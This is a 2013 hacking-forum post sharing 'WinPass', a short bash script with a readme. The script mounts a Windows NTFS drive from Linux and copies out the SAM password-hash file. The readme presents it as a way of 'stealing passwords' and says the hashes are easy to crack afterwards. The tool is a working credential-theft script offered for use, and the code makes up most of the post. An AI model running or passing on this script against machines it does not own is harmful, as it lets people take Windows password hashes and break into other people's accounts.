WinPass - Grab windows passwords from linux!

A place to submit all custom code, scripts, and programs.
Forum rules
Do NOT post malicious code or programs. Please review all code posted in this forum before downloading or running any of the code or programs here.

WinPass - Grab windows passwords from linux!

Post by 3vilp4wn on Thu Feb 28, 2013 8:48 pm
([msg=74298]see WinPass - Grab windows passwords from linux![/msg])

Hi all,

I just made a program to grab the SAM (passwords) file from a windows box via linux. My first shell script!
Note that this is by no means the easiest way to do this, nor is it anything new, but it's still nice info to have.


Here's the code:
Code: Select all
echo Welcome to WinPass!
echo You have WinPass version 1.0.0 beta.
echo WinPass assumes that the following conditions are true:
echo *The hard drive you want to grab data from is NTFS
echo *The SAM file is WINDOWS/system32/config/SAM
echo *You ran this program with sudo or as root

echo What hard disk do you wish to grab password data from?
read harddisk
echo WinPass wil read from /dev/$harddisk

mkdir /winpass
mount /dev/$harddisk /winpass -t ntfs -o nls=utf8,umask=0222

echo /dev/$harddisk mounted.

cd /winpass/WINDOWS/system32/config/
cp SAM ~

echo Password files copied to ~
echo Cleaning up...

cd /
umount /winpass
rmdir /winpass

echo Done!

And the readme:
Code: Select all
WinPass 1.0.0 beta
by 3vilp4wn

WinPass grabs windows passwords from linux.
WinPass must be ran with sudo or as root.
WinPass has been tested with Debian 6.0.6 stealing passwords from Windows XP, but should work for almost any linux distro, stealing from almost any windows version.
Once you grab the hashes, you will still need to decrypt them.  Due to the F***ING STUPID way windows hashes passwords, this is very easy, and will likely take only a few minutes.

Have Fun,


I am not responsible for *any* damage done to you or any computer as a result using this program.
Always audit the source code of the program before running it, and make sure it does not execute any commands you don't want it to.

Have fun,

Do not mistake understanding for realization, and do not mistake realization for liberation
Evil Ninja Hackers

User avatar
Posts: 144
Joined: Sun Feb 10, 2013 2:05 am
Location: The darkness.
Blog: View Blog (0)

Return to Custom Code

Who is online

Users browsing this forum: No registered users and 0 guests